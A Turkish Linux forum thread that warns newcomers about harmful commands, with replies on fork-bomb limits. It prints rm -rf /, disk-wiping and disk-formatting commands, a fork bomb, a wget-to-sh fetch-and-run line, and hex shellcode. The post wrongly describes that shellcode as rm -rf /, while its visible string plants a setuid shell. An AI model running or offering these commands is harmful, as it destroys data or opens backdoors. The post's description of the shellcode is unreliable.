Güvenlik : Bu komutlara dikkat!

Başlatan Xenophobia, 21 Kasım 2008 - 14:08:32

« önceki - sonraki »

0 Üyeler ve 1 Ziyaretçi konuyu incelemekte.

Xenophobia

Eğer linuxda yeni iseniz, bazı forumlarda ya da sitelerde yazılan herşeye inanmamanız sisteminizin sağlığı ve bilgilerinizin güvenliği açısından son derece önemli.

Okudugunuz ya da gördüğünüz her komutunu denemeye kalkışmamalısınız, öncelikle komutun ne yapmak için kullanıldığının anlaşılması son derece önemlidir.

Bir kaç zararlı komut hakkında sizleri bilgilendirelim,

1. rm –rf /

Bu komut çok tehlikelidir. Root dizininden başlayarak tüm dizinleri ve bu dizinlerin içerisinde bulunan tüm dizinleri siler.

2. char esp[] __attribute__ ((section(".text"))) /* e.s.p

release */

= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"

"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"

"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"

"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"

"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"

"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"

"\x6e\x2f\x73\x68\x00\x2d\x63\x00"

"cp -p /bin/sh /tmp/.beyond; chmod 4755

/tmp/.beyond;";

Bu komut rm –rf / komutunun hex halidirir. rm –rf / ile aynı sonuçları oluşturur.

3. mkfs.ext3 /dev/sda

Bu komut diskiniz üzerinde yer alan bilgileri formatlar.

4. : (){:|:&};:

Bu komut Forkbomb olarak bilinir. Sisteminize çalıştırabileceği kadar işlemi aynı anda çalıştırmasını söyler. Bir sürü işlem çalıştıran sistem belirli bir aşama sonra çöker.

5. any_command > /dev/sda

Bu komut sonucunda any_command kısmında kullanılan komutun sonucları disk üzerne yazılarak diskin dosya sistemine zarar verir.

6. wget http://some_untrusted_source -O- | sh

Kaynağını bilmediğiniz dosyaları asla indirip çalıştırmayınız. Aksi taktirde hackerlara kapılarınızı açmış olabilirsiniz. Bu komut kullanılırken alınacak paketin güvenilir olduğuna dikkat etmek lazımdır.

7. mv /home/yourhomedirectory/* /dev/null

Bu komut sizin home dizininizde bulunan bütün dosyaları siler. Bu dosyalara bir daha ulaşamadığını gibi sisteme giriş yapığınızda tüm kişisel bilgilerinizi kaybetmiş olursunuz.

Yazar : Caner Bulut

FACTOR2

Yararlı bir yazı olmuş.Teşekkürler.

xxx3

Teşekkürler sayenizde ubuntuyu biraz daha öğrendim  :D

Gimp Uzmanı

Teşekkürler. Hiç kullanmadığım ama dikkat edilmesi gereken komutlar.

heartsmagic

Böyle bir başlık açılmıştı zamanında ancak yanlış anlaşılabileceği için çöpe taşınmıştı. Sanırım üyeler tepki vermişti :D
Ben destekleyenler arasındaydım ancak demokrasi bizim de kellemizi kesmişti :)
Şimdi bakıyorum da herkes beğenmiş yazıyı.
Hayattan çıkarı olmayanların, ölümden de çıkarı olmayacaktır.
Hayatlarıyla yanlış olanların ölümleriyle doğru olmalarına imkân var mıdır?


Böylece yalan, dünyanın düzenine dönüştürülüyor.

Xenophobia

Neden tepki vermişlerdi ki? Bilmedikleri kötü şeyleri öğrendiklerini mi düşünüyorlardı yoksa?

Nihayetinde, sorununu çözmek isteyenler yüzlerce foruma giriyor, binlerce komut ile karşılaşıyor. Uzak duracaklarını bilmeleri hakları.

Fakat, yine sakıncalı görülüyorsa tekrar çöpe taşınabilir.

olaki

Aslında bilen bilir, bulan bulur ama yinede çapsız/kalitesiz bir hergelenin elinde ne olur düşünmüyor değilim hani... :-\
Antivirüsleri denemek için bir virüs dosyasını forumda herkese açık tutmak gibi... :)
Dün bir zerzevat örneği vardı galiba...

heartsmagic

Yanlış hatırlamıyorsam iki türlüydü tepkiler. Birincisi yanlış kişilerin ele geçmesi, diğeri de dikkatsiz kullanıcıların olabileceği :D
Benim açımdan sorun yok, zaten bulan bir şekilde buluyor. Bilinçlendirme adına ben seviyorum böyle başlıkları.
Hayattan çıkarı olmayanların, ölümden de çıkarı olmayacaktır.
Hayatlarıyla yanlış olanların ölümleriyle doğru olmalarına imkân var mıdır?


Böylece yalan, dünyanın düzenine dönüştürülüyor.

Felâsife

Bir tehlikeli komutta [bence] bu fsck komutu,
Pardus'ta bir kaç kere işime yaramıştı ama bir keresinde de sistemi uçurmuştu. :)

Not:
Ubuntu da zaten otomatik olarak galiba her 30 açılışta fsck (dosya hatası) taraması yapılıyor.
O yüzden kullanmaya gerek yok. (Tabi özel durumlar olabilir.)

Örnektir:
sudo fsck.ext3 /dev/sdxx
Maceraya hazır mısın!  Bir BSD almaz mısın?

ODİN

iyi hoş güzel insanları bilgilendirmişinzde benim gibi ubuntuya bilmem ne programını ararken o sayfadan o sayfaya yönlendirilen kod bilgisi olmayan lınux kullanıcıları bu durumda çok aciz kalıyoruz ukalalık yapmak istemem ama ubuntu sistemini yazanlar bu vb. zararlı komutlara karşı tedbir alablir masıl mı

mesela ben o kodlardan birini kopyalayıp yapıştırdım uçbirime uçbirim beni anlayabileceğim şekilde uyarmalı bun komutu gerçekten çalıştırmak istiyor musun diye böyle bir önlem zor olmasa gerek ya da uç birimden indirilecek deponun güvenli olup olmadığını ubuntu kendisi tespit edebilir

işte o zaman lınux sistemler sıradan kullanıcılarında can attığı sistemler olur
Kişi, ışığını karartmayı da bilmelidir, böceklerden ve hayranlardan kurtulmak için.

heartsmagic

Alıntı yapılan: ODİN - 04 Ekim 2009 - 22:54:27
iyi hoş güzel insanları bilgilendirmişinzde benim gibi ubuntuya bilmem ne programını ararken o sayfadan o sayfaya yönlendirilen kod bilgisi olmayan lınux kullanıcıları bu durumda çok aciz kalıyoruz ukalalık yapmak istemem ama ubuntu sistemini yazanlar bu vb. zararlı komutlara karşı tedbir alablir masıl mı

mesela ben o kodlardan birini kopyalayıp yapıştırdım uçbirime uçbirim beni anlayabileceğim şekilde uyarmalı bun komutu gerçekten çalıştırmak istiyor musun diye böyle bir önlem zor olmasa gerek ya da uç birimden indirilecek deponun güvenli olup olmadığını ubuntu kendisi tespit edebilir

işte o zaman lınux sistemler sıradan kullanıcılarında can attığı sistemler olur

Bazıları için belki. Örneğin rm -rf / komutu sanırım Debian sistemlerde uyarı veriyordu. Ancak ne yazık ki her şeyi engellemenin bir yolu yok, kullanıcının kendisine kalıyor bazı şeyler. Mesela senin söylediğin depo işi zaten geçerli. Bu depolar harici kaynaklardır ve elle eklemen durumunda senden güvenlik anahtarı isterler.
Hayattan çıkarı olmayanların, ölümden de çıkarı olmayacaktır.
Hayatlarıyla yanlış olanların ölümleriyle doğru olmalarına imkân var mıdır?


Böylece yalan, dünyanın düzenine dönüştürülüyor.

badhero

Bilmediğim komutları zaten kullanmam, ama bu tarz "ölümcül" komutların varlığını öğrendikten sonra daha dikkatli olcam.

heartsmagic

Bir önceki iletime ek olsun:

rm -ir /
Alıntı Yaprm: cannot remove root directory "/'

Not: Deneyecekseniz bile lütfen -f ile denemeyin. Göze alıp ben bile denemedim, bu nedenle -i kullandım. -f denenecekse bile en güzeli sanal makinede denemektir. Yüksek ihtimalle -f kullanılsa bile sistem izin vermeyecektir fakat günlük kullanılan bir sistemde lütfen denemeyin.
Hayattan çıkarı olmayanların, ölümden de çıkarı olmayacaktır.
Hayatlarıyla yanlış olanların ölümleriyle doğru olmalarına imkân var mıdır?


Böylece yalan, dünyanın düzenine dönüştürülüyor.

sdincsoy

çok yararlı bilgiler. teşekkürü borç bilirim.
Ayrıca 4. madde çok enteresan geldi. root olmadan çalışır mı acaba bu komutlar ?
eğer çalışıyorsa kötü derim... Basit bir mail ya da scriptle sistemimin çökeceğini düşünmek bile istemem.
Ben 15 senedir bilgisayarla uğraşıyorum ancak linux da yeni sayilirim.
Sonuçta kullandığım kadarını biliyorum. Oysa bildiğim şeylerin linux un %5 i bile olduğunu sanmıyorum...
Böyle bilgilerin devamını dilerim.

bytan

4. madde için root yetkisine gerek yok. Yanlış hatırlamıyorsam bir süre önce buna berzer bir konu daha açılmıştı forumda.

http://en.wikipedia.org/wiki/Fork_bomb

Not: İlgili mesajı buldum:

http://forum.ubuntu-tr.net/index.php?topic=11488.msg142956#msg142956
Umut en büyük kötülüktür; işkenceyi uzatır. - F.N.


Bir şey ne ise odur, bu kadar. Öyleyse, iki şey arasında bağdaşıklık varsa, bu aralarında iletişim kuruyorlar demek değildir.
"... kavrayışını bilgi ile derinleştir ..."
PF @ ST

utdmr

Alıntı yapılan: sdincsoy - 08 Kasım 2009 - 20:17:06
Ayrıca 4. madde çok enteresan geldi. root olmadan çalışır mı acaba bu komutlar ?

Evet, root olmadan da çalışabiliyor çünkü yetkisiz bir kullanıcı da standart olarak istediği kadar işlem başlatabilir. Bunu önlemek için bir işlemle kullanıcı başına açılabileck işlem sayısını sınırlayabiliyorduk sanırım.
Kişisel Blogum: Çoğunlukla Zararsız - cogunluklazararsiz.org
--
Any intelligent fool can make things bigger, more complex, and more violent. It takes a touch of genius -and a lot of courage- to move in the opposite direction.

sdincsoy

Forkbomb dan korunmak için;

Alıntıdır;
http://www.linuxnet.com.tr/modules.php?name=Forums&file=viewtopic&t=3122


Bugun linuxquestions.org'da konu gundeme gelince buraya yazayim dedim.

Cogu linux dagitiminin varsayilan (ontanimli) ayarlarinda siradan bir kullanicinin calistirabilecegi surec, acabilecegi dosya sayisi v.b. parametrelere ya sinir konmamistir ya da sinirlar yuksek tutulmustur. Bilgisayarinizi bir ev bilgisayari olarak kullanacaksaniz elbette bu bir sorun olusturmuyor. Ancak sunucu olarak kullanacaksaniz, ozellikle surec sayisina kisitlama getirilmemesi sonucu bu aciktan yararlanan saldirilar yasamaniz mumkun.

Bu saldirilar sistem guvenlik onlemlerini asan saldirilar degil; yani sifreleriniz, dosyalariniz guvendedir. Ancak, sisteminizin tum islemci gucu ve belleginin kullanilmasi sonucu sistem donma noktasina gelebilir.

Sahip oldugunuz kullaniciya konmus kisitlamalari gormek icin

Kod:

ulimit -a


komutunu kullanabilirsiniz. Calisabilecek surec sayisini diyelim 500 ile sinirlamak istersek

ulimit -u 500

dememiz yeterli. Sistem yoneticisi bu komutu /etc/profiles dosyasina koyarak siniri herkes icin gecerli yapabilir.

Ancak sinirlar iki cesit: Gevsek (soft) ve kati (hard). Gevsek sinirlar asilabiliyor. En guvenli yol, kati sinirlarla bu isi cozmek. Bunun icin, sisteminizin kullandigi guvenlik sistemine gore /etc/limits (shadow kullananlar icin) ya da /etc/security/limits.conf (PAM kullananlar icin) dosyalarini duzenleyebilirsiniz.

Ornegin, /etc/security/limits.conf ile, "users" grubundaki tum kullanicilar icin en fazla surec sayisinin 500 olmasini istiyorsak, dosyaya

Kod:
@users           hard    nproc           500


satirini ekliyoruz.

Onlem alindiktan sonra bash altinda asagidaki kodun sistemi zorlamamasi gerekir:
Kod:
:(){ :&:;};:

(Onlem almadiysaniz bu kodu denemeye kalkmayin).

Surec sayisi icin makul sinirin ne oldugu, bilgisayarinizda calisan programlara gore degisir. Cok dusuk tutulmasi halinde kullanicilar KDE, Gnome gibi programlari bile kullanamayabilirler.

agritux

Linux dünyasında bu bilgileri kötü amaçla kullanabilecek yoktur herhalde.
Bundan sonraki yazacaklarım belki çok tepki toplayacak ama;
Varsada anca Türklerden yani bizden çıkar diye düşünüyorum :)
Linuxu kullanma sebebimiz belli.
Bazılarımız ne anlama geldiğini bile bilmiyor :)
Felsefesi nedir, neden açık kaynak neden özgür yazılım vs...
Benimde tam olarak bildiğim söylenemez hani... :P

Herneyse; 4.komutu denemeyi çok isterdim. Çok merak ettim :)
acep sanal makinada denesek ne olur ?
Veya sistem nasıl çöküyor? birdaha açılmıyor mu?

heartsmagic

@sessizce, o an çakılır ancak açılır sistem.

Bu komutu denetenleri de biliyorum :) Örneğin bir IRC kanalında -isim vermeyeyim :)- Sonuç tahmin edilebilir sanırım, kanalın yarısı "Quit:  Connection reset by peer" :)
Hayattan çıkarı olmayanların, ölümden de çıkarı olmayacaktır.
Hayatlarıyla yanlış olanların ölümleriyle doğru olmalarına imkân var mıdır?


Böylece yalan, dünyanın düzenine dönüştürülüyor.

agritux


ırmak

Çok yararlı paylaşım.
Üstelik komutların denenmiş hallerini de gördüm.
Youtube'dan aratabilirsiniz;)
Mesela;
http://www.youtube.com/watch?v=wWOjmvWPRvQ&feature=fvst

10ur_kaan

teşşekur ederim sayenizde ubuntuyu yavas yavas ogreniyorum